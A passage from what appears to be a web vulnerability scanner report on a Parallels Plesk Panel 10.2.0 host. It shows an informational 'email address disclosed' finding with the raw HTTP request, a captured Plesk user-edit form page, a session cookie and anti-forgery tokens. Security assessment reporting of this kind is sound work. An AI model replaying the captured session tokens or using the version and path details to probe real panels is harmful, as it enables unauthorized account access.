<span class="title">Error:</span> Invalid URL was requested. </div>
</div></div></div></div></div></div>


<div id="content-body" class="clearfix">
<div id="main">

<script type="text/javascript">
//<![CDATA[
Smb.UserEditForm = Class.create({

initialize: function(config) {

if (!$('general-account-loginString')) {
return;
}

if ($('general-vcard-email-emailType-internal')) {
$('general-vcard-email-emailType-internal').observe('click', this._generateLogin.bind(this));
}
if ($('general-vcard-email-internalEmail')) {
$('general-vcard-email-internalEmail').observe('keyup', this._generateLogin.bind(this));
$('general-vcard-email-internalEmail').observe('change', this._generateLogin.bind(this));
}
if ($('general-vcard-email-domain')) {
$('general-vcard-email-domain').observe('change', this._generateLogin.bind(this));
}

if ($('general-vcard-email-emailType-external')) {
$('general-vcard-email-emailType-external').observe('click', this._generateLogin.bind(this));
}
if ($('general-vcard-email-externalEmail')) {
$('general-vcard-email-externalEmail').observe('keyup', this._generateLogin.bind(this));
$('general-vcard-email-externalEmail').observe('change', this._generateLogin.bind(this));
}
},

_generateLogin: function() {
if ($('general-vcard-email-emailType-internal') && $('general-vcard-email-emailType-internal').checked) {
var loginString = $('general-vcard-email-internalEmail').value;
if ('' == loginString) {
//empty username
} else
if ($('general-vcard-email-domain')) {
loginString += '@' + $('general-vcard-email-domain').options[$('general-vcard-email-domain').selectedIndex].text;
} else {
loginString += '@' + $('general-vcard-email-internalEmail-domain').innerHTML;
}
$('general-account-loginString').update(loginString);
} else if ($('general-vcard-email-emailType-external') && $('general-vcard-email-emailType-external').checked) {
var loginString = $('general-vcard-email-externalEmail').value;
$('general-account-loginString').update(loginString);
} else if ($('general-vcard-email-externalEmail')) {
var loginString = $('general-vcard-email-externalEmail').value;
$('general-account-loginString').update(loginString);
}
}
});

Jsw.onReady(function() {
new Smb.UserEditForm();
});
//]]>
</script><form id="form-user" enctype="application/x-www-form-urlencoded" action="" method="post"><div id='form-tab-buttons' class='tabs'></div><script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.bar.Tabs({
type: 'dynamic',
applyTo: 'form-tab-buttons',
items: [{"componentType":"Jsw.bar.Button","title":"General","tabId":"tab-general","containerCls":"active"},{"componentType":"Jsw.bar.Button","title":"Contact Details","tabId":"tab-contacts","containerCls":""}]
});
});
</script>

<div id='tab-general' >

<div id='general-vcard' class='form-box' >
<div id='general-vcard-content-area'>
<div id='general-vcard-contactName-form-row' class='form-row' >
<div class='field-name'><label for='general-vcard-contactName'>Contact name&nbsp;<span class="required">*</span></label></div>
<div class='field-value'>

<input type="text" name="general[vcard][contactName]" id="general-vcard-contactName" value="format-1" class="f-middle-size input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div class="form-row">
<div class='field-name'>
<label for='general-vcard-email-emailType'>E-mail address which is also used as a username for logging in to the Panel&nbsp;</label> <span class="required">*</span>
</div>
<div class="field-value">
<div class="text-value">
<div class="indent-box">

<span><input type="radio" class="radio"
value="internal"
id="general-vcard-email-emailType-internal"
name="general[vcard][email][emailType]"
checked="checked" /></span>

<div class="indent-box-content">
<label for="general-vcard-email-emailType-internal">Create an e-mail address under your account</label>
<div class='form-row'>
<div>
<input type="text" name="general[vcard][email][internalEmail]" id="general-vcard-email-internalEmail" value="format-1" class="input-text" /> @<span id='general-vcard-email-internalEmail-domain'>vulnerable.host.fqdn</span></div>
<span class='field-errors'>
</span>
</div>
</div>

</div>
<div class="indent-box">

<span><input type="radio" class="radio"
value="external"
id="general-vcard-email-emailType-external"
name="general[vcard][email][emailType]"
/></span>

<div class="indent-box-content">
<label for="general-vcard-email-emailType-external">Use an external e-mail address</label>
<div class='form-row'>
<div>
<input type="text" name="general[vcard][email][externalEmail]" id="general-vcard-email-externalEmail" value="format-1@nosedivesailing.com" class="f-middle-size input-text" disabled="1" /></div>
<span class='field-errors'>
</span>
</div>
</div>

</div>
</div>
</div>
</div>

<script type="text/javascript">
//<![CDATA[
Smb.UserEmailForm = Class.create({

initialize: function(config) {
this._prefix = config['prefix'];
this._internalEmailId = this._prefix + config['internalEmailId'];
this._internalEmailElements = config['internalEmailElements'];
this._externalEmailId = this._prefix + config['externalEmailId'];
this._externalEmailElements = config['externalEmailElements'];
$(this._internalEmailId).observe('click', this._internalEmailOnClick.bind(this));
$(this._externalEmailId).observe('click', this._externalEmailOnClick.bind(this));
if ($(this._internalEmailId).checked) {
this._internalEmailOnClick();
} else {
   this._externalEmailOnClick();
}
},

_internalEmailOnClick: function() {
this._externalEmailElements.each(function(elementId) {
$(this._prefix + elementId).disable();
}, this);
this._internalEmailElements.each(function(elementId) {
$(this._prefix + elementId).enable();
}, this);
},

_externalEmailOnClick: function() {
this._internalEmailElements.each(function(elementId) {
$(this._prefix + elementId).disable();
}, this);
this._externalEmailElements.each(function(elementId) {
$(this._prefix + elementId).enable();
}, this);
}
});

Jsw.onReady(function() {
new Smb.UserEmailForm({
prefix: 'general-vcard-email-',
internalEmailId: 'emailType-internal',
internalEmailElements: ['internalEmail'
],
externalEmailId: 'emailType-external',
externalEmailElements: ['externalEmail']
});

});
//]]>
</script>


<div id='general-vcard-roleId-form-row' class='form-row' >
<div class='field-name'><label for='general-vcard-roleId'>User role&nbsp;</label></div>
<div class='field-value'>

<select name="general[vcard][roleId]" id="general-vcard-roleId">
<option value="5" label="Owner">Owner</option>
<option value="6" label="WebMaster">WebMaster</option>
<option value="7" label="Application User" selected="selected">Application User</option>
<option value="8" label="Accountant">Accountant</option>
</select>
<span class='field-errors' style="display:none;"></span>
<span class="hint">User roles grant users administrative privileges and access to applications that you selected for the role.</span>
</div>
</div></div>
</div>
<script type='text/javascript'>
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Panel({
title: 'General Information',
applyTo: 'general-vcard'
});
});
//]]>
</script>


<div id='general-account' class='form-box' >
<div id='general-account-content-area'>

<div class='form-row'>
<div class='field-name'><label for='general-account-loginString'>Username&nbsp;</label></div>
<div class='field-value'>
<div class='text-value'>
<span id='general-account-loginString'>format-1@nosedivesailing.com</span>

</div>
</div>
</div>
<div id='general-account-password-form-row' class='form-row' >
<div class='field-name'><label for='general-account-password'>Password&nbsp;</label></div>
<div class='field-value'>

<input type="password" name="general[account][password]" id="general-account-password" value="" class="input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div><script type='text/javascript'>
Jsw.onReady(function() {
var pswd = $('general-account-password');
new Jsw.PasswordMeter({
renderTo: 'general-account-password',
renderMode: 'after',
observe: 'general-account-password',
locale: {"title":"Password Strength","description":"To improve your password: ","passwordTooShort":"Make the password longer.","lettersLowerCase":"Use at least one lower-case character.","lettersUpperCase":"Use at least one upper-case character.","numbers1":"Use at least one number.","numbers3":"Use at least three numbers.","specialChar1":"Use at least one special character (for example: !, @, #, $, % ,^, &, *, ?, _, ~).","specialChar2":"Use at least two special characters (for example: !, @, #, $, %, ^, &, *, ?, _, ~).","comboUpperAndLower":"Use both upper and lower-case characters.","comboLettersAndNumbers":"Use both numbers and characters.","comboLettersNumbersSpecial":"Use numbers, characters and special characters.","yourPasswordIsStrong":"Your password is strong, but you can make it even stronger by increasing its length.","verdictNone":"Very weak","verdictVeryWeak":"Very weak","verdictWeak":"Weak","verdictMediocre":"Medium","verdictStrong":"Strong","verdictStronger":"Very strong"}
}).render();
});</script>
<div id='general-account-passwordConfirmation-form-row' class='form-row' >
<div class='field-name'><label for='general-account-passwordConfirmation'>Confirm password&nbsp;</label></div>
<div class='field-value'>

<input type="password" name="general[account][passwordConfirmation]" id="general-account-passwordConfirmation" value="" class="input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>

<div class='form-row'>
<div class='single-row'>
<div class='indent-box'>

<input type="hidden" name="general[account][isActive]" value="0" /><input type="checkbox" name="general[account][isActive]" id="general-account-isActive" value="1" checked="checked" class="checkbox" />
<div class='indent-box-content'>
<label for='general-account-isActive'>User is active&nbsp;</label>
<span class="hint">Active users can access the Panel.</span>
</div>
</div>
</div>
</div></div>
</div>
<script type='text/javascript'>
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Panel({
title: 'Panel Preferences',
applyTo: 'general-account'
});
});
//]]>
</script>
</div>
<div id='tab-contacts' style="display: none;">

<div id='contacts-contactsSection' class='form-box' >
<div id='contacts-contactsSection-content-area'>
<div id='contacts-contactsSection-companyName-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-companyName'>Company name&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="contacts[contactsSection][companyName]" id="contacts-contactsSection-companyName" value="" class="f-middle-size input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-phone-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-phone'>Phone number&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="contacts[contactsSection][phone]" id="contacts-contactsSection-phone" value="" class="f-middle-size input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-fax-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-fax'>Fax number&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="contacts[contactsSection][fax]" id="contacts-contactsSection-fax" value="" class="f-middle-size input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-address-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-address'>Address&nbsp;</label></div>
<div class='field-value'>

<textarea name="contacts[contactsSection][address]" id="contacts-contactsSection-address" class="f-middle-size" rows="4" cols="80"></textarea>
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-city-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-city'>City&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="contacts[contactsSection][city]" id="contacts-contactsSection-city" value="" class="f-middle-size input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-state-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-state'>State or province&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="contacts[contactsSection][state]" id="contacts-contactsSection-state" value="" class="input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-zip-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-zip'>Postal or ZIP code&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="contacts[contactsSection][zip]" id="contacts-contactsSection-zip" value="" class="input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-country-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-country'>Country&nbsp;</label></div>
<div class='field-value'>

<select name="contacts[contactsSection][country]" id="contacts-contactsSection-country">
<option value="AF" label="Afghanistan">Afghanistan</option>
<option value="AX" label="..land Islands">..land Islands</option>
<option value="AL" label="Albania">Albania</option>
<option value="DZ" label="Algeria">Algeria</option>
<option value="AS" label="American Samoa">American Samoa</option>
<option value="AD" label="Andorra">Andorra</option>
<option value="AO" label="Angola">Angola</option>
<option value="AI" label="Anguilla">Anguilla</option>
<option value="AQ" label="Antarctica">Antarctica</option>
<option value="AG" label="Antigua and Barbuda">Antigua and Barbuda</option>
<option value="AR" label="Argentina">Argentina</option>
<option value="AM" label="Armenia">Armenia</option>
<option value="AW" label="Aruba">Aruba</option>
<option value="AU" label="Australia">Australia</option>
<option value="AT" label="Austria">Austria</option>
<option value="AZ" label="Azerbaijan">Azerbaijan</option>
<option value="BS" label="Bahamas">Bahamas</option>
<option value="BH" label="Bahrain">Bahrain</option>
<option value="BD" label="Bangladesh">Bangladesh</option>
<option value="BB" label="Barbados">Barbados</option>
<option value="BY" label="Belarus">Belarus</option>
<option value="BE" label="Belgium">Belgium</option>
<option value="BZ" label="Belize">Belize</option>
<option value="BJ" label="Benin">Benin</option>
<option value="BM" label="Bermuda">Bermuda</option>
<option value="BT" label="Bhutan">Bhutan</option>
<option value="BO" label="Bolivia, Plurinational State of">Bolivia, Plurinational State of</option>
<option value="BA" label="Bosnia and Herzegovina">Bosnia and Herzegovina</option>
<option value="BW" label="Botswana">Botswana</option>
<option value="BV" label="Bouvet Island">Bouvet Island</option>
<option value="BR" label="Brazil">Brazil</option>
<option value="IO" label="British Indian Ocean Territory">British Indian Ocean Territory</option>
<option value="BN" label="Brunei Darussalam">Brunei Darussalam</option>
<option value="BG" label="Bulgaria">Bulgaria</option>
<option value="BF" label="Burkina Faso">Burkina Faso</option>
<option value="BI" label="Burundi">Burundi</option>
<option value="KH" label="Cambodia">Cambodia</option>
<option value="CM" label="Cameroon">Cameroon</option>
<option value="CA" label="Canada">Canada</option>
<option value="CV" label="Cape Verde">Cape Verde</option>
<option value="KY" label="Cayman Islands">Cayman Islands</option>
<option value="CF" label="Central African Republic">Central African Republic</option>
<option value="TD" label="Chad">Chad</option>
<option value="CL" label="Chile">Chile</option>
<option value="CN" label="China">China</option>
<option value="CX" label="Christmas Island">Christmas Island</option>
<option value="CC" label="Cocos (Keeling) Islands">Cocos (Keeling) Islands</option>
<option value="CO" label="Colombia">Colombia</option>
<option value="KM" label="Comoros">Comoros</option>
<option value="CG" label="Congo">Congo</option>
<option value="CD" label="Congo, the Democratic Republic of the">Congo, the Democratic Republic of the</option>
<option value="CK" label="Cook Islands">Cook Islands</option>
<option value="CR" label="Costa Rica">Costa Rica</option>
<option value="CI" label="Cote D'Ivoire">Cote D'Ivoire</option>
<option value="HR" label="Croatia">Croatia</option>
<option value="CU" label="Cuba">Cuba</option>
<option value="CY" label="Cyprus">Cyprus</option>
<option value="CZ" label="Czech Republic">Czech Republic</option>
<option value="DK" label="Denmark">Denmark</option>
<option value="DJ" label="Djibouti">Djibouti</option>
<option value="DM" label="Dominica">Dominica</option>
<option value="DO" label="Dominican Republic">Dominican Republic</option>
<option value="EC" label="Ecuador">Ecuador</option>
<option value="EG" label="Egypt">Egypt</option>
<option value="SV" label="El Salvador">El Salvador</option>
<option value="GQ" label="Equatorial Guinea">Equatorial Guinea</option>
<option value="ER" label="Eritrea">Eritrea</option>
<option value="EE" label="Estonia">Estonia</option>
<option value="ET" label="Ethiopia">Ethiopia</option>
<option value="FK" label="Falkland Islands (Malvinas)">Falkland Islands (Malvinas)</option>
<option value="FO" label="Faroe Islands">Faroe Islands</option>
<option value="FJ" label="Fiji">Fiji</option>
<option value="FI" label="Finland">Finland</option>
<option value="FR" label="France">France</option>
<option value="GF" label="French Guiana">French Guiana</option>
<option value="PF" label="French Polynesia">French Polynesia</option>
<option value="TF" label="French Southern Territories">French Southern Territories</option>
<option value="GA" label="Gabon">Gabon</option>
<option value="GM" label="Gambia">Gambia</option>
<option value="GE" label="Georgia">Georgia</option>
<option value="DE" label="Germany">Germany</option>
<option value="GH" label="Ghana">Ghana</option>
<option value="GI" label="Gibraltar">Gibraltar</option>
<option value="GR" label="Greece">Greece</option>
<option value="GL" label="Greenland">Greenland</option>
<option value="GD" label="Grenada">Grenada</option>
<option value="GP" label="Guadeloupe">Guadeloupe</option>
<option value="GU" label="Guam">Guam</option>
<option value="GT" label="Guatemala">Guatemala</option>
<option value="GG" label="Guernsey">Guernsey</option>
<option value="GN" label="Guinea">Guinea</option>
<option value="GW" label="Guinea-Bissau">Guinea-Bissau</option>
<option value="GY" label="Guyana">Guyana</option>
<option value="HT" label="Haiti">Haiti</option>
<option value="HM" label="Heard Island and McDonald Islands">Heard Island and McDonald Islands</option>
<option value="VA" label="Holy See (Vatican City State)">Holy See (Vatican City State)</option>
<option value="HN" label="Honduras">Honduras</option>
<option value="HK" label="Hong Kong">Hong Kong</option>
<option value="HU" label="Hungary">Hungary</option>
<option value="IS" label="Iceland">Iceland</option>
<option value="IN" label="India">India</option>
<option value="ID" label="Indonesia">Indonesia</option>
<option value="IR" label="Iran, Islamic Republic of">Iran, Islamic Republic of</option>
<option value="IQ" label="Iraq">Iraq</option>
<option value="IE" label="Ireland">Ireland</option>
<option value="IM" label="Isle of Man">Isle of Man</option>
<option value="IL" label="Israel">Israel</option>
<option value="IT" label="Italy">Italy</option>
<option value="JM" label="Jamaica">Jamaica</option>
<option value="JP" label="Japan">Japan</option>
<option value="JE" label="Jersey">Jersey</option>
<option value="JO" label="Jordan">Jordan</option>
<option value="KZ" label="Kazakhstan">Kazakhstan</option>
<option value="KE" label="Kenya">Kenya</option>
<option value="KI" label="Kiribati">Kiribati</option>
<option value="KP" label="Korea, Democratic People's Republic of">Korea, Democratic People's Republic of</option>
<option value="KR" label="Korea, Republic of">Korea, Republic of</option>
<option value="KW" label="Kuwait">Kuwait</option>
<option value="KG" label="Kyrgyzstan">Kyrgyzstan</option>
<option value="LA" label="Lao People's Democratic Republic">Lao People's Democratic Republic</option>
<option value="LV" label="Latvia">Latvia</option>
<option value="LB" label="Lebanon">Lebanon</option>
<option value="LS" label="Lesotho">Lesotho</option>
<option value="LR" label="Liberia">Liberia</option>
<option value="LY" label="Libyan Arab Jamahiriya">Libyan Arab Jamahiriya</option>
<option value="LI" label="Liechtenstein">Liechtenstein</option>
<option value="LT" label="Lithuania">Lithuania</option>
<option value="LU" label="Luxembourg">Luxembourg</option>
<option value="MO" label="Macao">Macao</option>
<option value="MK" label="Macedonia, the Former Yugoslav Republic of">Macedonia, the Former Yugoslav Republic of</option>
<option value="MG" label="Madagascar">Madagascar</option>
<option value="MW" label="Malawi">Malawi</option>
<option value="MY" label="Malaysia">Malaysia</option>
<option value="MV" label="Maldives">Maldives</option>
<option value="ML" label="Mali">Mali</option>
<option value="MT" label="Malta">Malta</option>
<option value="MH" label="Marshall Islands">Marshall Islands</option>
<option value="MQ" label="Martinique">Martinique</option>
<option value="MR" label="Mauritania">Mauritania</option>
<option value="MU" label="Mauritius">Mauritius</option>
<option value="YT" label="Mayotte">Mayotte</option>
<option value="MX" label="Mexico">Mexico</option>
<option value="FM" label="Micronesia, Federated States of">Micronesia, Federated States of</option>
<option value="MD" label="Moldova, Republic of">Moldova, Republic of</option>
<option value="MC" label="Monaco">Monaco</option>
<option value="MN" label="Mongolia">Mongolia</option>
<option value="ME" label="Montenegro">Montenegro</option>
<option value="MS" label="Montserrat">Montserrat</option>
<option value="MA" label="Morocco">Morocco</option>
<option value="MZ" label="Mozambique">Mozambique</option>
<option value="MM" label="Myanmar">Myanmar</option>
<option value="NA" label="Namibia">Namibia</option>
<option value="NR" label="Nauru">Nauru</option>
<option value="NP" label="Nepal">Nepal</option>
<option value="NL" label="Netherlands">Netherlands</option>
<option value="AN" label="Netherlands Antilles">Netherlands Antilles</option>
<option value="NC" label="New Caledonia">New Caledonia</option>
<option value="NZ" label="New Zealand">New Zealand</option>
<option value="NI" label="Nicaragua">Nicaragua</option>
<option value="NE" label="Niger">Niger</option>
<option value="NG" label="Nigeria">Nigeria</option>
<option value="NU" label="Niue">Niue</option>
<option value="NF" label="Norfolk Island">Norfolk Island</option>
<option value="MP" label="Northern Mariana Islands">Northern Mariana Islands</option>
<option value="NO" label="Norway">Norway</option>
<option value="OM" label="Oman">Oman</option>
<option value="PK" label="Pakistan">Pakistan</option>
<option value="PW" label="Palau">Palau</option>
<option value="PS" label="Palestinian Territory, Occupied">Palestinian Territory, Occupied</option>
<option value="PA" label="Panama">Panama</option>
<option value="PG" label="Papua New Guinea">Papua New Guinea</option>
<option value="PY" label="Paraguay">Paraguay</option>
<option value="PE" label="Peru">Peru</option>
<option value="PH" label="Philippines">Philippines</option>
<option value="PN" label="Pitcairn">Pitcairn</option>
<option value="PL" label="Poland">Poland</option>
<option value="PT" label="Portugal">Portugal</option>
<option value="PR" label="Puerto Rico">Puerto Rico</option>
<option value="QA" label="Qatar">Qatar</option>
<option value="RE" label="Reunion">Reunion</option>
<option value="RO" label="Romania">Romania</option>
<option value="RU" label="Russian Federation">Russian Federation</option>
<option value="RW" label="Rwanda">Rwanda</option>
<option value="BL" label="Saint Barthelemy">Saint Barthelemy</option>
<option value="SH" label="Saint Helena, Ascension and Tristan da Cunha">Saint Helena, Ascension and Tristan da Cunha</option>
<option value="KN" label="Saint Kitts and Nevis">Saint Kitts and Nevis</option>
<option value="LC" label="Saint Lucia">Saint Lucia</option>
<option value="MF" label="Saint Martin">Saint Martin</option>
<option value="PM" label="Saint Pierre and Miquelon">Saint Pierre and Miquelon</option>
<option value="VC" label="Saint Vincent and the Grenadines">Saint Vincent and the Grenadines</option>
<option value="WS" label="Samoa">Samoa</option>
<option value="SM" label="San Marino">San Marino</option>
<option value="ST" label="Sao Tome and Principe">Sao Tome and Principe</option>
<option value="SA" label="Saudi Arabia">Saudi Arabia</option>
<option value="SN" label="Senegal">Senegal</option>
<option value="RS" label="Serbia">Serbia</option>
<option value="SC" label="Seychelles">Seychelles</option>
<option value="SL" label="Sierra Leone">Sierra Leone</option>
<option value="SG" label="Singapore">Singapore</option>
<option value="SK" label="Slovakia">Slovakia</option>
<option value="SI" label="Slovenia">Slovenia</option>
<option value="SB" label="Solomon Islands">Solomon Islands</option>
<option value="SO" label="Somalia">Somalia</option>
<option value="ZA" label="South Africa">South Africa</option>
<option value="GS" label="South Georgia and the South Sandwich Islands">South Georgia and the South Sandwich Islands</option>
<option value="ES" label="Spain">Spain</option>
<option value="LK" label="Sri Lanka">Sri Lanka</option>
<option value="SD" label="Sudan">Sudan</option>
<option value="SR" label="Suriname">Suriname</option>
<option value="SJ" label="Svalbard and Jan Mayen">Svalbard and Jan Mayen</option>
<option value="SZ" label="Swaziland">Swaziland</option>
<option value="SE" label="Sweden">Sweden</option>
<option value="CH" label="Switzerland">Switzerland</option>
<option value="SY" label="Syrian Arab Republic">Syrian Arab Republic</option>
<option value="TW" label="Taiwan">Taiwan</option>
<option value="TJ" label="Tajikistan">Tajikistan</option>
<option value="TZ" label="Tanzania, United Republic of">Tanzania, United Republic of</option>
<option value="TH" label="Thailand">Thailand</option>
<option value="TL" label="Timor-Leste">Timor-Leste</option>
<option value="TG" label="Togo">Togo</option>
<option value="TK" label="Tokelau">Tokelau</option>
<option value="TO" label="Tonga">Tonga</option>
<option value="TT" label="Trinidad and Tobago">Trinidad and Tobago</option>
<option value="TN" label="Tunisia">Tunisia</option>
<option value="TR" label="Turkey">Turkey</option>
<option value="TM" label="Turkmenistan">Turkmenistan</option>
<option value="TC" label="Turks and Caicos Islands">Turks and Caicos Islands</option>
<option value="TV" label="Tuvalu">Tuvalu</option>
<option value="UG" label="Uganda">Uganda</option>
<option value="UA" label="Ukraine">Ukraine</option>
<option value="AE" label="United Arab Emirates">United Arab Emirates</option>
<option value="GB" label="United Kingdom">United Kingdom</option>
<option value="US" label="United States" selected="selected">United States</option>
<option value="UM" label="United States Minor Outlying Islands">United States Minor Outlying Islands</option>
<option value="UY" label="Uruguay">Uruguay</option>
<option value="UZ" label="Uzbekistan">Uzbekistan</option>
<option value="VU" label="Vanuatu">Vanuatu</option>
<option value="VE" label="Venezuela, Bolivarian Republic of">Venezuela, Bolivarian Republic of</option>
<option value="VN" label="Viet Nam">Viet Nam</option>
<option value="VG" label="Virgin Islands, British">Virgin Islands, British</option>
<option value="VI" label="Virgin Islands, U.S.">Virgin Islands, U.S.</option>
<option value="WF" label="Wallis and Futuna">Wallis and Futuna</option>
<option value="EH" label="Western Sahara">Western Sahara</option>
<option value="YE" label="Yemen">Yemen</option>
<option value="ZM" label="Zambia">Zambia</option>
<option value="ZW" label="Zimbabwe">Zimbabwe</option>
</select>
<span class='field-errors' style="display:none;"></span>

</div>
</div></div>
</div>
<script type='text/javascript'>
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Panel({
title: '',
applyTo: 'contacts-contactsSection'
});
});
//]]>
</script>
</div>

<div class="btns-box">
<div class="box-area">
<div class="form-row">
<div class="field-name">
<span class="required">*</span>
Required fields </div>
<div class="field-value">

<span id='btn-send' class='btn'></span>
<script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.CommandButton({
applyTo: 'btn-send',
title: 'OK',
cls: 'btn',
name: 'send',
value: '',
description: '',
disabled: false,
handler: function(event) { Jsw.submit(this); }
});
});
</script>

<span id='btn-cancel' class='btn'></span>
<script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.CommandButton({
applyTo: 'btn-cancel',
title: 'Cancel',
cls: 'btn',
name: 'cancel',
value: '',
description: '',
disabled: false,
handler: function(event) { Jsw.redirect("/user/list"); }
});
});
</script>

<input type="hidden" name="hidden" value="" id="hidden" />
<!-- ability to submit form via Enter -->
<input type="image" src="/skins/default/img/blank.gif" style="border: 0; height: 0; width: 0; position: absolute;" />
</div>
</div>
</div>
</div>

<input type="hidden" name="forgery_protection_token" value="bdaafe67daaa200e2f077bd9577b09f4" id="form_forgery_protection_token" /></form>
<script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.FormAjax({
applyTo: 'form-user',
waitButtonTitle: 'Please wait'
})
});
</script>

</div> <!-- /main -->


</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

11.10. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/user/edit/id/4  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /smb/user/edit/id/4

Issue detail

The following email address was disclosed in the response:

Request

GET /smb/user/edit/id/4 HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Proxy-Connection: keep-alive
Referer: http://www.nosedivesailing.com:8880/smb/user/list
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PLESKSESSID=17161f28b87a6960fb097d11330c9c53; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 18:29:11 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 18:29:11 GMT
Connection: close
Content-Length: 45522

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="3e86204e9517123c7f585d736d64aa3f" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<title>format-1 - Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/user/action-name/edit" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
